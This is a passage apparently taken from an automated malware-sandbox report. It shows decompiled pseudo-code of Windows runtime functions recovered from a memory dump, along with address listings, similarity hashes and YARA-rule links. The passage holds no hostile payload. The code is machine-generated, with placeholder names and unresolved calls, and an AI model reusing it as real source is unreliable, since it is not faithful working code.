						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E050CAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5178474 - 3;
										if( *0x5178474 != 3) {
											 *0x51779dc =  *0x51779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E050A7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E050A7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05107016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5178708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5177b00; // 0x0
							asm("ror esi, cl");
							 *0x517b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E050C95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E05097F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x050b03f1
0x050b03f7
0x050b03f9
0x050b03fb
0x050b03fd
0x050b0400
0x050b040a
0x050f4c7a
0x050b0537
0x050b0547
0x050b0410
0x050b0410
0x050b0414
0x050b0417
0x050b041a
0x050b0421
0x050b0424
0x050b042b
0x050b043b
0x050b043e
0x050b043f
0x050b043f
0x050b0446
0x050b0449
0x050b044c
0x050b044f
0x050b0459
0x050f4c8d
0x050b045f
0x050b045f
0x050b045f
0x050b0467
0x050f4c97
0x050f4c9d
0x050f4ca4
0x050f4caa
0x050f4caf
0x050f4cb1
0x050f4cc3
0x050f4cb3
0x050f4cbc
0x050f4cbc
0x050f4cc8
0x050f4ccb
0x050f4cd7
0x050f4cda
0x050f4cdf
0x050f4cdf
0x050f4ccb
0x050f4ca4
0x050b046d
0x050b046f
0x050b046f
0x050b0471
0x050b0476
0x050b047a
0x050b047b
0x050b0483
0x050b0489
0x050b048d
0x00000000
0x00000000
0x050f4ce9
0x050f4cef
0x050f4d22
0x050f4d22
0x00000000
0x050f4d22
0x050f4cf1
0x050f4cf7
0x00000000
0x00000000
0x050f4cf9
0x050f4cff
0x00000000
0x00000000
0x050f4d05
0x050f4d07
0x00000000
0x00000000
0x050f4d0d
0x050f4d0f
0x050f4d14
0x050f4d16
0x00000000
0x00000000
0x050f4d1c
0x050f4d1c
0x050b0499
0x050b0535
0x050b0535
0x00000000
0x050b0535
0x050b04a6
0x050f4d2c
0x050f4d37
0x050f4d39
0x050f4d3b
0x00000000
0x00000000
0x050f4d41
0x050f4d48
0x050b0527
0x050b052b
0x050b052d
0x050b0530
0x050b0530
0x00000000
0x050b052b
0x050f4d4e
0x050b04ac
0x050b04ac
0x050b04af
0x050b04b2
0x050b04b7
0x050b04b9
0x050b04bb
0x050b04bd
0x050b04bf
0x050b04c5
0x050b04c9
0x050f4d53
0x050f4d59
0x050f4db9
0x050f4dba
0x050f4dbf
0x050f4dc2
0x050f4dc4
0x050f4dc7
0x050f4dce
0x00000000
0x050f4dce
0x050f4d5b
0x050f4d61
0x00000000
0x00000000
0x050f4d63
0x050f4d69
0x00000000
0x00000000
0x050f4d6b
0x050f4d6e
0x050f4d74
0x050f4d76
0x050f4d7c
0x050f4d7e
0x050f4d84
0x050f4d89
0x050f4d8c
0x050f4d8d
0x050f4d92
0x050f4d95
0x050f4d96
0x050f4d98
0x050f4d9a
0x050f4d9f
0x050f4da4
0x050f4da6
0x050f4da8
0x050f4daf
0x050f4db1
0x050f4db1
0x050f4daf
0x050f4da6
0x050f4d84
0x050f4d7c
0x00000000
0x050f4d74
0x050b04d6
0x050f4de1
0x050b04dc
0x050b04dc
0x050b04dc
0x050b04e4
0x050f4deb
0x050f4df1
0x050f4df8
0x050f4dfe
0x050f4e03
0x050f4e05
0x050f4e17
0x050f4e07
0x050f4e10
0x050f4e10
0x050f4e1c
0x050f4e1f
0x050f4e35
0x050f4e35
0x050f4e1f
0x050f4df8
0x050b04f1
0x050b04fa
0x050f4e3f
0x050f4e47
0x050f4e5b
0x050f4e61
0x050f4e67
0x050f4e69
0x050f4e71
0x050f4e73
0x050b0500
0x050b0500
0x050b0500
0x050b04fa
0x050b0508
0x050b051d
0x050b051d
0x050b051f
0x050b0524
0x00000000
0x050b0524
0x050b0515
0x050b0517
0x050f4e7a
0x050f4e7c
0x00000000
0x00000000
0x050f4e85
0x00000000
0x050f4e85
0x00000000
0x050b0517

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f1d8c4b567729fd6f0b5aa594a9d4d82ad16ffd3a7fe998e6e5d838a20a78fa
Instruction ID: c1581ffdae8cc2af8dfaf50ee36329c170c18a94fc0638f24223f24c753108a5
Opcode Fuzzy Hash: 5f1d8c4b567729fd6f0b5aa594a9d4d82ad16ffd3a7fe998e6e5d838a20a78fa
Instruction Fuzzy Hash: CC91F371A046189FEF219A68E898BFF7BE5FB01724F050265EE11AB6D0DBB49D40C781

Uniqueness

Uniqueness Score: -1.00%

Function 0508C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0508C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x517d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E05096D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E050CB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5177b9c; // 0x0
					_t74 = L050A4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E050C9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L050A77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E050CF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E050C13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L050A77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E050C9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0508c608
0x0508c615
0x0508c625
0x0508c62d
0x0508c635
0x0508c640
0x0508c680
0x0508c687
0x0508c688
0x0508c689
0x0508c694
0x0508c694
0x0508c642
0x0508c64a
0x0508c697
0x050f7a25
0x050f7a2b
0x050f7a2e
0x050f7a30
0x050f7bea
0x050f7bea
0x00000000
0x050f7bea
0x050f7a36
0x050f7a43
0x050f7a48
0x050f7a4c
0x050f7a4e
0x00000000
0x00000000
0x050f7a58
0x050f7a5a
0x050f7a5b
0x050f7a5c
0x050f7a5d
0x050f7a63
0x050f7a64
0x050f7a6a
0x050f7a6c
0x050f7a6e
0x050f79cb
0x050f79cb
0x050f79ce
0x050f79d0
0x050f7a98
0x050f7a9b
0x050f7a9b
0x050f7a9e
0x050f7aa1
0x050f7bbe
0x050f7bbe
0x050f7bc0
0x050f7be0
0x050f7be0
0x050f7a01
0x050f7a01
0x050f7a05
0x050f7a07
0x050f7a15
0x050f7a15
0x050f7a1a
0x00000000
0x050f7a1a
0x050f7bc2
0x050f7bc6
0x050f7bc9
0x050f7bcd
0x050f7bcf
0x050f79e6
0x050f79e6
0x050f79eb
0x050f79eb
0x050f79ef
0x050f79f1
0x00000000
0x00000000
0x050f79f3
0x050f79f5
0x050f79ff
0x050f79ff
0x00000000
0x050f79ff
0x050f79f7
0x050f79fd
0x00000000
0x00000000
0x00000000
0x050f79fd
0x050f7bd5
0x050f7bd8
0x00000000
0x00000000
0x050f7ba9
0x050f7bac
0x050f7bb0
0x050f7bb1
0x050f7bb1
0x050f7bb6
0x00000000
0x050f7bb6
0x050f7aa7
0x050f7aaa
0x00000000
0x00000000
0x050f7ab2
0x050f7ab3
0x050f7ab5
0x050f7aec
0x050f7aef
0x050f7b25
0x050f7b28
0x050f7b62
0x050f7b64
0x050f7b8f
0x050f7b92
0x050f7b96
0x050f7b98
0x00000000
0x00000000
0x050f7b9e
0x050f7b9f
0x050f7ba3
0x00000000
0x050f7ba3
0x050f7b66
0x050f7b68
0x050f7ae2
0x050f7ae2
0x00000000
0x050f7ae2
0x050f7b6e
0x050f7b72
0x050f7b75
0x050f7b81
0x050f7b85
0x050f7b87
0x00000000
0x00000000
0x050f7b31
0x050f7b34
0x050f7b3c
0x050f7b45
0x050f7b46
0x050f7b4f
0x050f7b51
0x050f7b57
0x050f7b59
0x050f7b59
0x00000000
0x050f7b59
0x050f7b77
0x00000000
0x050f7b77
0x050f7b2a
0x00000000
0x050f7b2a
0x050f7af1
0x050f7af3
0x00000000
0x00000000
0x050f7afb
0x050f7afc
0x050f7afe
0x00000000
0x00000000
0x050f7b00
0x050f7b03
0x00000000
0x00000000
0x050f7b05
0x050f7b09
0x050f7b0d
0x050f7b0f
0x00000000
0x00000000
0x050f7b18
0x050f7b1d
0x00000000
0x050f7b1d
0x050f7ab7
0x050f7ab9
0x00000000
0x00000000
0x050f7abf
0x050f7ac1
0x00000000
0x00000000
0x050f7ac3
0x050f7ac6
0x00000000
0x00000000
0x050f7ac8
0x050f7acc
0x050f7ad0
0x050f7ad2
0x00000000
0x00000000
0x050f7adb
0x00000000
0x050f7adb
0x050f79d6
0x050f79d9
0x050f79dc
0x050f7a91
0x050f7a94
0x00000000
0x050f7a94
0x050f79e2
0x00000000
0x050f79e2
0x050f7a74
0x050f7a7a
0x00000000
0x00000000
0x050f7a8a
0x050f7a21
0x050f7a21
0x00000000
0x050f7a21
0x0508c650
0x0508c651
0x0508c656
0x0508c65c
0x0508c65d
0x0508c663
0x0508c664
0x0508c66a
0x0508c66e
0x050f79c5
0x050f79c7
0x00000000
0x050f79c7
0x0508c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efd1c21d37c3326a64a3a38787be66911364d5aba81c285ff291e1131f99ba4f
Instruction ID: fced5e503393bde0235bb1393a6717274625eb46e533f5406de4c5589001825f
Opcode Fuzzy Hash: efd1c21d37c3326a64a3a38787be66911364d5aba81c285ff291e1131f99ba4f
Instruction Fuzzy Hash: 04818E756082019BDB66CF14E880F7E77EAFB84350F15486AEE469B645D330ED41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0511B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0511B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5177b9c; // 0x0
				_t124 = L050A4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E050C9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E050C95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E050C95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L050A77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E050C9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E050C95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5177b9c; // 0x0
									_t92 = L050A4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E050C9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0508A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0511E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0511E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E050C95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0511b8d9
0x0511b8e4
0x00000000
0x0511b8e6
0x0511b8f3
0x0511b8f5
0x0511b8f5
0x0511b8f8
0x0511b920
0x0511b924
0x0511b936
0x0511b939
0x0511b93d
0x0511b948
0x0511b9a0
0x0511b9a0
0x0511b9a4
0x0511b9bf
0x0511b9c4
0x0511b9c6
0x0511b9cd
0x0511b9d1
0x0511bad4
0x0511bad8
0x0511bada
0x0511badc
0x0511badc
0x0511badf
0x0511bae0
0x0511bae2
0x0511bae4
0x0511baec
0x0511baee
0x0511baf0
0x0511baf0
0x0511baec
0x0511bafb
0x0511bafc
0x0511bafe
0x0511bb01
0x0511bb01
0x00000000
0x0511bb06
0x0511b9d7
0x0511b9db
0x0511b9db
0x0511b9de
0x0511b9de
0x0511b9e4
0x0511b9e7
0x0511b9ea
0x0511b9ec
0x0511b9ef
0x0511b9f3
0x0511ba1b
0x0511ba1b
0x0511ba23
0x0511ba24
0x0511ba27
0x0511ba2a
0x0511ba2b
0x0511ba2e
0x0511ba30
0x0511ba37
0x0511ba3f
0x0511ba9c
0x0511baa2
0x0511bb13
0x0511bb15
0x0511baae
0x0511baae
0x0511bab3
0x0511bab5
0x0511baba
0x0511bac8
0x0511bac8
0x0511baba
0x0511bacd
0x0511bacf
0x00000000
0x0511bacf
0x0511bb1a
0x00000000
0x0511bb1c
0x0511baa7
0x0511bb11
0x00000000
0x0511bb11
0x0511baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0511ba41
0x0511ba41
0x0511ba41
0x0511ba58
0x0511ba5d
0x0511ba62
0x00000000
0x00000000
0x0511ba64
0x0511ba67
0x0511ba68
0x0511ba69
0x0511ba6c
0x0511ba6f
0x0511ba71
0x0511ba78
0x0511ba80
0x00000000
0x00000000
0x0511ba90
0x0511ba90
0x0511ba97
0x00000000
0x0511ba97
0x0511b9f5
0x0511b9f7
0x0511b9f7
0x0511b9fa
0x0511ba03
0x0511ba07
0x0511ba0c
0x0511ba10
0x0511ba17
0x00000000
0x0511b9f7
0x0511b9a6
0x0511b9a8
0x0511b9af
0x0511b9b3
0x00000000
0x00000000
0x0511b9b9
0x00000000
0x0511b9b9
0x0511b94d
0x0511b98f
0x0511b995
0x0511b999
0x0511b960
0x0511b967
0x0511b968
0x0511b96a
0x00000000
0x0511b96a
0x0511b99b
0x0511b99e
0x00000000
0x00000000
0x00000000
0x0511b99e
0x0511b951
0x0511b954
0x0511b95a
0x0511b95e
0x0511b972
0x0511b979
0x0511b97d
0x0511b97f
0x0511b980
0x0511b982
0x0511b984
0x00000000
0x0511b984
0x00000000
0x0511b926
0x00000000
0x0511b926

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f365a94ac7f8a3cd147d7cf132991838e7f2370214f5dd67c24d15453a66af
Instruction ID: cbb397564092b1e96748434867954f0d81b93957a4ebfccea6ee027c2bfa51f4
Opcode Fuzzy Hash: e5f365a94ac7f8a3cd147d7cf132991838e7f2370214f5dd67c24d15453a66af
Instruction Fuzzy Hash: 64712232208705EFD731CF14C984FAABBB6FB44720F1149B8EA56876A0DB71E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 050852A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E050852A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0509EEF0(0x51779a0);
					_t104 =  *0x5178210; // 0x3362bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0509EB70(_t93, 0x51779a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E050C9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0509EEF0(0x51779a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0509EB70(0, 0x51779a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3362bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E050BF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0509EEF0(0x51779a0);
									__eflags =  *0x5178210 - _t104; // 0x3362bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5178210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E05104888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0509EB70(_t95, 0x51779a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E050C95D0();
											L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E050C95D0();
											L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0509EB70(_t93, 0x51779a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E050C95D0();
